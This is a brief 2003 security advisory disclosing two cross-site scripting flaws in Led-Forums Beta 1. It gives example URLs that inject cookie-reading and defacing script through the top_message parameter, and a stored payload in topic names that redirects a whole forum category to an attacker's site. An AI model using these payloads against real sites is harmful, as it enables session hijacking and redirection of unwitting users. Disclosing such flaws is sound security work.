Product: Led-Forums Versions: Beta 1 Vulnerability: XSS- and redirection-Bug Date: October 30, 2003 Discovered by: ProXy <proxy@excluded.org> 1. - XSS-Bug The Welcome-Message of the Led-Forums software could be changed by everybody. Normal Text, HTML and Javascript it's all allowed! :) eg: http://host/~path/index.php?top_message=<script>alert(document.cookie)</script> http://host/~path/index.php?top_message=<h1>OWNED?%20*g*</h1> -- 2. - Redirection-Bug HTML-tags are allowed in topic-names as well as Javascript. So if anybody insert the following JS-code in the topic-field of a new thread the complete forum-category would be redirected to the adress the attacker indicates. <script>window.location='http://www.excluded.org'</script> - ProXy - http://www.excluded.org
